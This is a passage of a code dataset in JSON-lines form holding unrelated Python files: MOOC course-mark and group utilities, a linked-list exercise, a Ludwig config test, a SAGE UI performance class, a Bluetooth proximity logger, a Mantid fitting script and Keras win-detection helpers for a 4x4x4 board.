update_answer_docs)\n\n\ndef update_passed(db, collection, passed_now, data):\n if not passed_now:\n return\n stats_collection = db.get_collection(collection)\n stats_collection.update(\n data,\n {'$inc': {'passed': 1}},\n safe=True\n )\n\n\ndef update_course_mark_by_user(course, user):\n db = mongodb.get_db()\n for unit in course.unit_set.all():\n for kq in unit.knowledgequantum_set.all():\n updated_kq, passed_kq_now = update_kq_mark(db, kq, user, course.threshold)\n update_passed(db, 'stats_kq', passed_kq_now, {'kq_id': kq.pk})\n updated_unit, passed_unit_now = update_unit_mark(db, unit, user, course.threshold)\n update_passed(db, 'stats_unit', passed_unit_now, {'unit_id': unit.pk})\n updated_course, passed_course_now = update_course_mark(db, course, user)\n update_passed(db, 'stats_course', passed_course_now, {'course_id': course.pk})\n\ndef get_sillabus_tree(course,user,minversion=True,incontext=False):\n units = []\n\n current_mark_kq = course.get_user_mark(user)\n\n course_units = get_units_available_for_user(course, user, True)\n\n if len(course_units) > 0:\n if not incontext:\n\n for u in course_units:\n unit, current_mark_kq = get_unit_tree(u, user, current_mark_kq, minversion)\n units.append(unit)\n\n else:\n if current_mark_kq is not None:\n unit, current_mark_kq = get_unit_tree(current_mark_kq.unit, user, current_mark_kq, minversion)\n units.append(unit)\n else:\n prev = None\n for u in course_units:\n unit, current_mark_kq = get_unit_tree(u, user, current_mark_kq, minversion)\n\n if not unit['complete']:\n units.append(unit)\n return units\n else:\n prev = unit\n units.append(prev)\n\n return units\n\ndef get_unit_tree(unit, user, current_mark_kq, minversion=True):\n questions = []\n unitcomplete = True\n current_marked = False\n\n for q in KnowledgeQuantum.objects.filter(unit_id=unit.id):\n\n completed = q.is_completed(user)\n\n # If one question is not completed unit is not completed\n if unitcomplete and not completed:\n unitcomplete = False\n\n current = False\n if not current_marked and current_mark_kq is not None:\n current = q == current_mark_kq\n elif not current_marked:\n current = not completed\n\n if current == True:\n current_marked = True\n current_mark_kq = q\n\n qa = {\n \"completed\" : completed,\n \"pk\" : q.pk,\n \"title\": q.title,\n \"url\": \"/course/\"+unit.course.slug+\"/classroom/#!unit\"+str(unit.pk)+\"/kq\"+str(q.pk),\n \"current\" : current\n }\n\n if not minversion:\n qa[\"has_video\"] = get_media_type(q.media_content_type) == \"video\"\n qa[\"has_presentation\"] = get_media_type(q.media_content_type) == \"presentation\"\n qa[\"has_book\"] = get_media_type(q.media_content_type) == \"book\"\n qa[\"has_attachments\"] = len(q.attachment_set.filter()) > 0\n qa[\"has_test\"] = len(q.question_set.filter()) > 0\n qa[\"has_pr\"] = q.kq_type() == \"PeerReviewAssignment\"\n\n questions.append(qa)\n\n unit = {\n 'id': unit.id,\n 'title': unit.title,\n 'status': unit.status,\n 'url': \"/course/\"+unit.course.slug+\"/classroom/#!unit\"+str(unit.pk),\n 'unittype': unit.unittype,\n 'badge_class': get_unit_badge_class(unit),\n 'badge_tooltip': unit.get_unit_type_name(),\n 'complete' : unitcomplete,\n 'questions' : questions\n }\n\n return unit, current_mark_kq\n\ndef create_groups(id_course):\n id_course = int(id_course)\n\n mongodb.get_db().get_collection('groups').remove({\"id_course\": {\"$eq\": id_course}})\n if(mongodb.get_db().get_collection('groups').find({\"id_course\":id_course}).count() == 0):\n\n course = Course.objects.filter(id=id_course)[:1].get()\n 
size_group = course.group_max_size\n students = course.students.all()\n\n num_groups = len(students) / size_group\n groupNames = {\n 'es': 'Grupo',\n 'en': 'Group',\n 'fr': 'Groupe',\n 'pt': 'Grupo',\n 'de': 'Gruppe',\n 'it': 'Gruppo'\n }\n groups = {}\n for lang in settings.LANGUAGES:\n groups[lang[0]] = []\n\n for student in students:\n lang = student.get_profile().language\n country = student.get_profile().country\n if not lang:\n lang = ''\n if not country:\n country = ''\n\n student = {\"id_user\": student.id, \"username\": student.username,\n \"first_name\":student.first_name, \"last_name\":student.last_name,\n \"email\": student.email, \"karma\": student.get_profile().karma, \"country\": country,\n \"language\": lang}\n\n if not lang or lang not in groupNames:\n if course.languages.count() > 0:\n lang = course.languages.all()[0].abbr.encode()\n else:\n lang = settings.DEFAULT_LANGUAGE\n\n group = None\n if len(groups[lang]) > 0:\n group = groups[lang][-1]\n\n if not group or len(group[\"members\"]) >= course.group_max_size:\n group = {\"id_course\": id_course, \"name\": groupNames[lang] + str(len(groups[lang])+1), \"hashtag\": course.hashtag+groupNames[lang] + str(len(groups[lang])+1), \"lang\": lang, \"size\": 1, \"members\": []}\n group[\"members\"].append(student)\n groups[lang].append(group)\n else:\n group[\"members\"].append(student)\n if \"size\" in group:\n group[\"size\"] += 1\n else:\n group[\"size\"] = len(group[\"members\"])\n groups[lang][-1] = group\n\n for lang in settings.LANGUAGES:\n for group in groups[lang[0]]:\n mongodb.get_db().get_collection('groups').insert(group)\n\ndef get_group_by_user_and_course(id_user, id_course):\n\n db = mongodb.get_db().get_collection('groups')\n group = db.find_one( { 'id_course': id_course, 'members.id_user':id_user } )\n return group\n\ndef get_groups_by_course(id_course, my_group=None):\n if my_group is not None:\n return mongodb.get_db().get_collection('groups').find({\"$and\":[{'id_course':int(id_course)},{\"_id\": {'$ne': ObjectId(my_group)}}]}).sort(\"_id\",pymongo.ASCENDING)\n else:\n return mongodb.get_db().get_collection('groups').find({'id_course':int(id_course)}).sort(\"_id\",pymongo.ASCENDING)\n\ndef change_user_group(id_user, id_group, new_id_group, pos_lat=0.0, pos_lon=0.0):\n groupCollection = mongodb.get_db().get_collection('groups')\n group = groupCollection.find_one({'_id': ObjectId(id_group)})\n\n for m in group[\"members\"]:\n if m[\"id_user\"] == id_user:\n member = m\n group[\"members\"].remove(m)\n if \"size\" in group:\n group[\"size\"] -= 1\n else:\n group[\"size\"] = len(group[\"members\"])\n\n groupCollection.update({'_id': ObjectId(id_group)}, {\"$set\": {\"members\": group[\"members\"], \"size\": group[\"size\"]}})\n group = groupCollection.find_one({'_id': ObjectId(new_id_group)})\n group[\"members\"].append(member)\n if \"size\" in group:\n group[\"size\"] += 1\n else:\n group[\"size\"] = len(group[\"members\"])\n groupCollection.update({'_id': ObjectId(new_id_group)}, {\"$set\": {\"members\": group[\"members\"], \"size\": group[\"size\"]}})\n\n groupsActivityCollection = mongodb.get_db().get_collection('groups_activity')\n timestamp = int(round(time.time() * 1000))\n activity_entry = {\"id_course\": group[\"id_course\"], \"id_user\": id_user, \"former_id_group\": ObjectId(id_group), \"new_id_group\": ObjectId(new_id_group), \"timestamp\": timestamp, \"lat\": pos_lat, \"lon\": pos_lon}\n groupsActivityCollection.insert(activity_entry)\n\n# def get_course_students_csv(course):\n# course_file = 
StringIO.StringIO()\n#\n# course_csv = csv.writer(course_file, quoting=csv.QUOTE_ALL)\n# headers = [\"first_name\", \"last_name\", \"email\", \"language\"]\n# course_csv.writerow(headers)\n#\n# h = HTMLParser()\n# for student in course.students.all():\n# row = []\n# for field in headers:\n# fieldvalue = getattr(student, field)\n# row.append(h.unescape(fieldvalue).encode(\"utf-8\", \"replace\"))\n# course_csv.writerow(row)\n#\n# return course_file.getvalue()\n\ndef get_course_students_csv(course, studentlist):\n course_file = StringIO.StringIO()\n\n course_csv = csv.writer(course_file, quoting=csv.QUOTE_ALL)\n headers = [\"first_name\", \"last_name\", \"email\", \"language\"]\n course_csv.writerow(headers)\n\n h = HTMLParser()\n if not hasattr(studentlist[:1][0], 'student'):\n for student in studentlist:\n row = []\n try:\n language = student.get_profile().get_language_display() or _(u\"Not defined\")\n row = [\n h.unescape(student.first_name).encode(\"utf-8\", \"replace\"),\n h.unescape(student.last_name).encode(\"utf-8\", \"replace\"),\n h.unescape(student.email).encode(\"utf-8\", \"replace\"),\n h.unescape(language).encode(\"utf-8\", \"replace\"),\n ]\n except:\n continue\n course_csv.writerow(row)\n else:\n for student in studentlist:\n row = []\n try:\n language = student.get_profile().get_language_display() or _(u\"Not defined\")\n row = [\n h.unescape(student.student.first_name).encode(\"utf-8\", \"replace\"),\n h.unescape(student.student.last_name).encode(\"utf-8\", \"replace\"),\n h.unescape(student.student.email).encode(\"utf-8\", \"replace\"),\n h.unescape(language).encode(\"utf-8\", \"replace\"),\n ]\n except:\n continue\n course_csv.writerow(row)\n\n return course_file.getvalue()\n\ndef get_csv_from_students_list(course, studentlist):\n course_file = StringIO.StringIO()\n\n course_csv = csv.writer(course_file, quoting=csv.QUOTE_ALL)\n headers = [\"first_name\", \"last_name\", \"email\", \"mark\"]\n course_csv.writerow(headers)\n\n h = HTMLParser()\n if not hasattr(studentlist[:1][0], 'student'):\n for student in studentlist:\n row = []\n try:\n mark, mark_info = get_course_mark(course, student)\n row = [\n h.unescape(student.first_name).encode(\"utf-8\", \"replace\"),\n h.unescape(student.last_name).encode(\"utf-8\", \"replace\"),\n h.unescape(student.email).encode(\"utf-8\", \"replace\"),\n \"%.2f\" % mark\n ]\n except:\n continue\n course_csv.writerow(row)\n else:\n for student in studentlist:\n row = []\n try:\n mark, mark_info = get_course_mark(course, student.student)\n row = [\n h.unescape(student.student.first_name).encode(\"utf-8\", \"replace\"),\n h.unescape(student.student.last_name).encode(\"utf-8\", \"replace\"),\n h.unescape(student.student.email).encode(\"utf-8\", \"replace\"),\n \"%.2f\" % mark\n ]\n except:\n continue\n course_csv.writerow(row)\n\n return course_file.getvalue()\n\ndef get_course_teachers_csv(course):\n course_file = StringIO.StringIO()\n\n course_csv = csv.writer(course_file, quoting=csv.QUOTE_ALL)\n headers = [\"first_name\", \"last_name\", \"email\"]\n course_csv.writerow(headers)\n\n h = HTMLParser()\n for teacher in course.teachers.all():\n row = []\n for field in headers:\n fieldvalue = getattr(teacher, field)\n row.append(h.unescape(fieldvalue).encode(\"utf-8\", \"replace\"))\n course_csv.writerow(row)\n\n return course_file.getvalue()\n\ndef create_kq_activity(kq, user):\n activityCollection = mongodb.get_db().get_collection('activity')\n kq_activity = {\n \"course_id\": kq.unit.course.id,\n \"unit_id\": kq.unit.id,\n \"kq_id\": kq.id,\n 
\"user_id\": user.id,\n \"timestamp\": int(round(time.time() * 1000)),\n \"lat\": 0.0,\n \"lon\": 0.0\n }\n kq_key = {\n \"course_id\": kq.unit.course.id,\n \"unit_id\": kq.unit.id,\n \"kq_id\": kq.id,\n \"user_id\": user.id\n }\n activityCollection.update(kq_key, { '$setOnInsert': kq_activity}, upsert=True);\n\ndef has_user_passed_course(user, course):\n passed = False\n total_mark, units_info = get_course_mark(course, user)\n if course.threshold is not None and float(course.threshold) <= total_mark:\n passed = True\n return passed\n\ndef get_course_activity_dates_for_user(course, user):\n result = {}\n user_course = CourseStudent.objects.get(student_id=user.id, course_id=course.id)\n\n db = mongodb.get_db()\n activity = db.get_collection(\"activity\")\n last_course_activity = activity.find({\n \"user_id\": user.id,\n \"course_id\": course.id,\n }).sort(\"timestamp\", pymongo.DESCENDING).limit(1)\n\n\n if user_course.timestamp:\n result[\"enrollDate\"] = datetime.utcfromtimestamp(user_course.timestamp)\n if last_course_activity.count() > 0:\n result[\"lastViewDate\"] = datetime.utcfromtimestamp(last_course_activity[0][\"timestamp\"]/1000.0)\n\n return result\n","sub_path":"moocng/courses/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":25895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"432093746","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def reverseKGroup(self, head, k):\n \"\"\"\n :type head: ListNode\n :type k: int\n :rtype: ListNode\n \"\"\"\n # 退出条件\n if k == 0 or k == 1:\n return head\n\n def get_length(head):\n length = 0\n while head:\n head = head.next\n length += 1\n return length\n\n length = get_length(head)\n\n def reverse(head, l):\n first = head\n second = head.next\n while l:\n temp = second.next\n second.next = first\n first = second\n second = temp\n l -= 1\n return first, second\n\n n = length / k\n begin = head\n last = None\n for i in range(n):\n first, second = reverse(begin, k - 1)\n if i == 0:\n head = first\n else:\n last.next = first\n last = begin\n begin.next = second\n begin = second\n return head\n\n\n\n\n","sub_path":"codes/Aiamjay/Week1-Day4/25. Reverse Nodes in k-Group.py","file_name":"25. Reverse Nodes in k-Group.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"627318070","text":"import copy\n\nimport pytest\n\nfrom ludwig.constants import TRAINING, HYPEROPT\nfrom ludwig.utils.defaults import merge_with_defaults, default_training_params\nfrom tests.integration_tests.utils import binary_feature, category_feature, \\\n numerical_feature, text_feature, sequence_feature, vector_feature\n\n\nHYPEROPT_CONFIG = {\n \"parameters\": {\n \"training.learning_rate\": {\n \"space\": \"loguniform\",\n \"lower\": 0.001,\n \"upper\": 0.1,\n },\n \"combiner.num_fc_layers\": {\n \"space\": \"randint\",\n \"lower\": 2,\n \"upper\": 6\n },\n \"utterance.cell_type\": {\n \"space\": \"grid_search\",\n \"values\": [\"rnn\", \"gru\"]\n },\n \"utterance.bidirectional\": {\n \"space\": \"choice\",\n \"categories\": [True, False]\n },\n \"utterance.fc_layers\": {\n \"space\": \"choice\",\n \"categories\": [\n [{\"fc_size\": 512}, {\"fc_size\": 256}],\n [{\"fc_size\": 512}],\n [{\"fc_size\": 256}],\n ]\n }\n },\n \"sampler\": {\"type\": \"ray\"},\n \"executor\": {\"type\": \"ray\"},\n \"goal\": \"minimize\"\n}\n\nSCHEDULER = {'type': 'async_hyperband', 'time_attr': 'time_total_s'}\n\ndefault_early_stop = default_training_params['early_stop']\n\n\n@pytest.mark.parametrize(\"use_train,use_hyperopt_scheduler\", [\n (True,True),\n (False,True),\n (True,False),\n (False,False),\n])\ndef test_merge_with_defaults_early_stop(use_train, use_hyperopt_scheduler):\n all_input_features = [\n binary_feature(),\n category_feature(),\n numerical_feature(),\n text_feature(),\n ]\n all_output_features = [\n category_feature(),\n sequence_feature(),\n vector_feature(),\n ]\n\n # validate config with all features\n config = {\n 'input_features': all_input_features,\n 'output_features': all_output_features,\n HYPEROPT: HYPEROPT_CONFIG,\n }\n config = copy.deepcopy(config)\n\n if use_train:\n config[TRAINING] = {'batch_size': '42'}\n\n if use_hyperopt_scheduler:\n # hyperopt scheduler cannot be used with early stopping\n config[HYPEROPT]['sampler']['scheduler'] = SCHEDULER\n\n merged_config = merge_with_defaults(config)\n\n expected = -1 if use_hyperopt_scheduler else default_early_stop\n assert merged_config[TRAINING]['early_stop'] == expected\n","sub_path":"tests/ludwig/utils/test_defaults.py","file_name":"test_defaults.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"126743687","text":"############################################################################\r\n#\r\n# SAGE UI - A Graphical User Interface for SAGE\r\n# Copyright (C) 2005 Electronic Visualization Laboratory,\r\n# University of Illinois at Chicago\r\n#\r\n# All rights reserved.\r\n# \r\n# Redistribution and use in source and binary forms, with or without\r\n# modification, are permitted provided that the following conditions are met:\r\n# \r\n# * Redistributions of source code must retain the above copyright\r\n# notice, this list of conditions and the following disclaimer.\r\n# * Redistributions in binary form must reproduce the above\r\n# copyright notice, this list of conditions and the following disclaimer\r\n# in the documentation and/or other materials provided with the distribution.\r\n# * Neither the name of the University of Illinois at Chicago nor\r\n# the names of its contributors may be used to endorse or promote\r\n# products derived from this software without specific prior written permission.\r\n# \r\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\r\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\r\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\r\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\r\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\r\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\r\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\r\n# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\r\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\r\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\r\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\r\n#\r\n# Direct questions, comments etc about SAGE UI to www.evl.uic.edu/cavern/forum\r\n#\r\n# Author: Ratko Jagodic\r\n# \r\n############################################################################\r\n\r\nimport sys, string\r\n\r\n### Class to hold all the performace information\r\n### Instance of this class has to be created for every app instance ID on SAGE\r\nclass sageAppPerfInfo:\r\n\r\n def __init__(self) :\r\n self.displayArray = {}\r\n self.renderArray = {}\r\n self.dataArray = {}\r\n \r\n self.displayArray['bandWidth'] = self.__zerosHash(30)\r\n self.displayArray['frameRate'] = self.__zerosHash(30)\r\n self.displayArray['nodes'] = self.__zerosHash(30)\r\n self.displayArray['cpu'] = self.__zerosHash(30)\r\n self.displayArrayIndex = 0\r\n\r\n self.renderArray['bandWidth'] = self.__zerosHash(30)\r\n self.renderArray['frameRate'] = self.__zerosHash(30)\r\n self.renderArray['nodes'] = self.__zerosHash(30)\r\n self.renderArray['cpu'] = self.__zerosHash(30)\r\n self.renderArrayIndex = 0\r\n\r\n self.dataArray['bandWidth'] = self.__zerosHash(30)\r\n self.dataArray['nodes'] = self.__zerosHash(30)\r\n self.dataArray['cpu'] = self.__zerosHash(30)\r\n self.dataArrayIndex = 0\r\n\r\n #### Set the display performance Info\r\n #### @arg bandwidth Bandwidth\r\n #### @arg frameRate Frame rate\r\n #### @arg nodes Number of nodes\r\n #### @arg cpuUsage CPU utilisation\r\n def setDisplayPerfInfo(self, bandWidth, frameRate, nodes, cpuUsage):\r\n if (self.displayArrayIndex >= 30):\r\n self.displayArrayIndex = 0\r\n\r\n self.displayArray['bandWidth'][self.displayArrayIndex % 30] = bandWidth\r\n self.displayArray['frameRate'][self.displayArrayIndex % 30] = frameRate\r\n 
self.displayArray['nodes'][self.displayArrayIndex % 30] = nodes\r\n self.displayArray['cpu'][self.displayArrayIndex % 30] = cpuUsage\r\n\r\n self.displayArrayIndex = self.displayArrayIndex + 1\r\n\r\n\r\n\r\n #### Set the rendering performance Info\r\n #### @arg bandwidth Bandwidth\r\n #### @arg frameRate Frame rate\r\n #### @arg nodes Number of nodes\r\n #### @arg cpuUsage CPU utilisation\r\n def setRenderPerfInfo(self, bandWidth, frameRate, nodes, cpuUsage):\r\n if (self.renderArrayIndex >= 30):\r\n self.renderArrayIndex = 0\r\n\r\n self.renderArray['bandWidth'][self.renderArrayIndex] = bandWidth\r\n self.renderArray['frameRate'][self.renderArrayIndex] = frameRate\r\n self.renderArray['nodes'][self.renderArrayIndex] = nodes\r\n self.renderArray['cpu'][self.renderArrayIndex] = cpuUsage\r\n\r\n self.renderArrayIndex = self.renderArrayIndex + 1\r\n\r\n\r\n\r\n #### Get display information based on the specified item\r\n #### @arg interval No of values required (max = 30)\r\n #### @return Returns an array\r\n def getDisplayInformation(self, stItemName, interval):\r\n\r\n if (interval > 30 or interval < 0):\r\n print ('Out of bound range specified')\r\n return 0\r\n newArray = self.__zerosHash(interval) #zeros(type='Float32', shape=interval)\r\n newArrayIndex = self.displayArrayIndex - 1\r\n\r\n for x in range(0, interval):\r\n if newArrayIndex < 0:\r\n newArrayIndex = 29\r\n\r\n newArray[x] = self.displayArray[ stItemName ][newArrayIndex]\r\n newArrayIndex = newArrayIndex - 1\r\n\r\n return newArray\r\n\r\n\r\n\r\n #### Get rendering information based on the specified item\r\n #### @arg interval No of values required (max = 30)\r\n #### @return Returns an array\r\n def getRenderInformation(self, stItemName, interval):\r\n\r\n if (interval > 30 or interval < 0):\r\n print ('Out of bound range specified')\r\n return 0\r\n newArray = self.__zerosHash(interval) #zeros(type='Float32', shape=interval)\r\n newArrayIndex = self.renderArrayIndex - 1\r\n\r\n for x in range(0, interval):\r\n\r\n if newArrayIndex < 0:\r\n newArrayIndex = 29\r\n\r\n newArray[x] = self.renderArray[ stItemName ][newArrayIndex]\r\n newArrayIndex = newArrayIndex - 1\r\n \r\n return newArray\r\n\r\n\r\n # creates a hash of size \"size\" and initializes all the values to 0\r\n def __zerosHash(self, size):\r\n h = {}\r\n for i in range(0, size):\r\n h[i] = 0\r\n return h\r\n","sub_path":"ui/sageAppPerfInfo.py","file_name":"sageAppPerfInfo.py","file_ext":"py","file_size_in_byte":6161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
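A hypothetical usage of the `sageAppPerfInfo` ring buffer above: after more than 30 samples the oldest values are overwritten, and `getDisplayInformation` walks backwards from the write index, so the newest sample comes out first.

```python
# Hypothetical usage of sageAppPerfInfo above: feed 35 display samples,
# then read back the 5 most recent bandwidth values (newest first).
perf = sageAppPerfInfo()
for i in range(35):
    perf.setDisplayPerfInfo(bandWidth=i, frameRate=30, nodes=4, cpuUsage=0.5)
print(perf.getDisplayInformation('bandWidth', 5))
# {0: 34, 1: 33, 2: 32, 3: 31, 4: 30}
```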
+{"seq_id":"321432579","text":"\"\"\"\nAuthor: Bruno Luca\nDate: 12-09-2020\nTitle: invert dictionary\n\"\"\"\n\ndef invert_dictionary_mapping(d):\n invert = {}\n\n for key,value in d.items():\n invert.setdefault(value,[]).append(key)\n return invert\n\n\ndef main():\n initial_mapping = dict(a = 1, b = 2, c = 3, z = 1)\n\n print(f\"Before map inverting:\\n\\t{initial_mapping}\")\n print(f\"\\n\\nAfter map inverting:\\n\\t{invert_dictionary_mapping(initial_mapping)}\")\n\nif __name__ == \"__main__\":\n main()","sub_path":"tpsit_IV/summer_works/es11_2.py","file_name":"es11_2.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"161570916","text":"from datetime import datetime\nfrom bluepy.btle import Scanner\n\ndateTimeObj = datetime.now() #determines timestamp for filename\n\t\nfilename = dateTimeObj.strftime(\"%d_%H:%M\") #string for the filename (day hour:minute)\nf = open(str(filename) + \".txt\", \"w\") #creates a file\nf.close()\n\nwhile True:\n\tscanner = Scanner()\n\tdevices = scanner.scan(1.0) #scans for one second\n\t\n\tdateTimeObj = datetime.now() #determines timestamp\n\t\n\tfor device in devices: #loop over all detected devices\n\t\t\n\t\tdistance = (-3.55889 * device.rssi -121.75286)/100 #transforms RSSI into meters\n\t\t\n\t\tif distance < 1: #not enough distance!\n\t\t\ttimestamp = dateTimeObj.strftime(\"%Y/%b/%d %H:%M:%S.%f\") #timestamp strink\n\t\t\toutput = {timestamp : distance} #dictionary with timestamp and distance\n\t\t\t\n\t\t\tf = open(str(filename) + \".txt\", \"a\") #opens file\n\t\t\tf.write(str(output) + '\\n') #appends string to file\n\t\t\tf.close()\n\t\t\t\n\t\t\tprint(output) #prints dictionary written to file\n\t\t\n\t\telse: #safe distance\n\t\t\tpass\n","sub_path":"distancing.py","file_name":"distancing.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"288063256","text":"from mantid.simpleapi import *\nimport ncs\n\nforward_banks = ((135, 142), (143, 150), (151, 158), (159, 166),\n (167, 174), (175, 182), (183, 190), (191, 198))\n\n\nruns = \"15039-15045\"\nspectra = []\nfor srange in forward_banks:\n spectra.append(\"{0}-{1}\".format(*srange))\nspectra = \";\".join(spectra)\nsum_spectra = True\ndiff_type=\"SingleDifference\" # Allowed values=Single,Double,Thick\nip_file = \"IP0004_10.par\"\n\n## Define fitting options ##\nfit_options = ncs.FitOptions()\nfit_options.smooth_points = None\nfit_options.bad_data_error = 1e6\nfit_options.background_order = None # None to switch off\n\n# Mass options\nmass1 = {'value':1.0079, 'widths':[2,5,7], 'function':'GramCharlier',\n 'hermite_coeffs':[1,0,0],'k_free':False, 'sears_flag':1}\nmass2 = {'value':16.0, 'widths':10, 'function':'Gaussian'}\nmass3 = {'value':27.0, 'widths':13, 'function':'Gaussian'}\nmass4 = {'value':133.0, 'widths':30, 'function':'Gaussian'}\n\nfit_options.masses = [mass1, mass2, mass3, mass4]\n\n## Intensity constraints\nfit_options.constraints = ([0,1,0,-4])\n\n\n## Load data & preprocess ##\n\ntof_data = LoadVesuvio(Filename=runs, SpectrumList=spectra,\n Mode=diff_type,InstrumentParFile=ip_file,SumSpectra=sum_spectra)\ntof_data = CropWorkspace(tof_data,XMin=50.0,XMax=562.0)\ntof_data = ncs.preprocess(tof_data, fit_options)\n\n## Run fitting ##\nfitted_ws, fitted_params = [], []\nfor idx in range(tof_data.getNumberHistograms()):\n fit_options.workspace_index = idx\n reduced_chi_square, params_ws = ncs.run_fit(tof_data, fit_options)\n fitted_ws.append(\"fit_%d\" % (idx+1))\n RenameWorkspace(\"fit_Workspace\", OutputWorkspace=fitted_ws[-1])\n fitted_params.append(\"params_%d\" % (idx+1))\n RenameWorkspace(\"fit_Parameters\", OutputWorkspace=fitted_params[-1])\n\n# Group\nfitted_data= GroupWorkspaces(fitted_ws)\nfitted_pars = GroupWorkspaces(fitted_params)\n\n## Print results to screen ##\n#ncs.display_fit_output(reduced_chi_square, params_ws,fit_options)\n","sub_path":"development/inelastic/vesuvio_user/ncs/CsHS204.py","file_name":"CsHS204.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"564126066","text":"import ParameterClasses as P\nimport MarkovModel as MarkovCls\nimport SupportMarkovModel as SupportMarkov\n\n# simulate no therapy\n# create a cohort\ncohort_none = MarkovCls.Cohort(id=0, therapy=P.Therapies.NONE)\n# simulate cohort\nsimOutputs_NONE = cohort_none.simulate()\n\n# simulate anticoagulation therapy\ncohort_anticoag = MarkovCls.Cohort(id=1, therapy=P.Therapies.ANTICOAG)\nsimOutputs_ANTICOAG = cohort_anticoag.simulate()\n\nSupportMarkov.draw_survival_curves_and_histograms(simOutputs_NONE, simOutputs_ANTICOAG)\n\nSupportMarkov.print_outcomes(simOutputs_NONE, \"No therapy\")\nSupportMarkov.print_outcomes(simOutputs_ANTICOAG, \"Anticoagulation theraoy\")\n\nSupportMarkov.print_comparative_outcomes(simOutputs_NONE, simOutputs_ANTICOAG)\n\nSupportMarkov.report_CEA_CBA(simOutputs_NONE, simOutputs_ANTICOAG)\n","sub_path":"ComparativeOutcomes.py","file_name":"ComparativeOutcomes.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"528168656","text":"import numpy as np\n\nfrom tensorflow.python.keras import Model\nfrom tensorflow.python.keras.layers import Input, Concatenate, Lambda\n\nfrom tensorflow.python.keras import backend as K\nfrom tensorflow.python.keras.layers import Layer\n\nimport tensorflow as tf\n\nANTIDIAG12 = np.array([[[[1 if i + j == 3 else 0 for k in range(0, 4)]\n for j in range(0, 4)]for i in range(0, 4)]], dtype=np.int32)\n\nANTIDIAG13 = np.array([[[[1 if i + k == 3 else 0 for k in range(0, 4)]\n for j in range(0, 4)]for i in range(0, 4)]], dtype=np.int32)\n\nANTIDIAG23 = np.array([[[[1 if j + k == 3 else 0 for k in range(0, 4)]\n for j in range(0, 4)]for i in range(0, 4)]], dtype=np.int32)\n\nFULLDIAG1 = np.array([[[[1 if i == j == k else 0 for k in range(0, 4)]\n for j in range(0, 4)]for i in range(0, 4)]], dtype=np.int32)\n\nFULLDIAG2 = np.array([[[[1 if i == j == 3 - k else 0 for k in range(0, 4)]\n for j in range(0, 4)]for i in range(0, 4)]], dtype=np.int32)\n\nFULLDIAG3 = np.array([[[[1 if i == 3 - j == k else 0 for k in range(0, 4)]\n for j in range(0, 4)]for i in range(0, 4)]], dtype=np.int32)\n\nFULLDIAG4 = np.array([[[[1 if 3 - i == j == k else 0 for k in range(0, 4)]\n for j in range(0, 4)]for i in range(0, 4)]], dtype=np.int32)\n\n\ndef greater3_on_axis(x, axis):\n x = K.sum(x, axis=axis)\n x = K.greater(x, 3)\n x = K.any(x)\n return x\n\n\ndef greater3(x):\n # x = K.print_tensor(x, 'input: ')\n x1 = greater3_on_axis(x, 1)\n x2 = greater3_on_axis(x, 2)\n x3 = greater3_on_axis(x, 3)\n x = K.stack([x1, x2, x3])\n # x = K.print_tensor(x, 'output: ')\n return K.any(x)\n\n\ndef diaggreater3_on_axis(x, i, j, k):\n assert j < k\n # x = tf.Print(x, [x], summarize=64, message='initial x: ')\n diag = tf.diag(np.array([1, 1, 1, 1], dtype=np.int32))\n # x = tf.Print(x, [diag], summarize=64, message='diagnonal: ')\n diag = K.stack([diag, diag, diag, diag], axis=i)\n # x = tf.Print(x, [diag], summarize=64, message='diagnonal: ')\n x = x * diag\n # x = tf.Print(x, [x], summarize=64, message='x * diag: ')\n x = K.sum(x, axis=k+1)\n # x = tf.Print(x, [x], summarize=64, message='x after first sum: ')\n x = K.sum(x, axis=j+1)\n # x = tf.Print(x, [x], summarize=64, message='x after second sum: ')\n x = K.greater(x, 3)\n x = K.any(x)\n return x\n\n\ndef diaggreater3(x):\n # x = K.print_tensor(x, 'input: ')\n x1 = diaggreater3_on_axis(x, 0, 1, 2)\n x2 = diaggreater3_on_axis(x, 1, 0, 2)\n x3 = diaggreater3_on_axis(x, 2, 0, 1)\n x = K.stack([x1, x2, x3])\n # x = tf.Print(x, [x], summarize=64, message='diagonals: ')\n return K.any(x)\n\n\ndef antidiaggreater3(x):\n x1 = x * tf.constant(ANTIDIAG23)\n x1 = K.sum(x1, axis=2)\n x1 = K.sum(x1, axis=2)\n x1 = 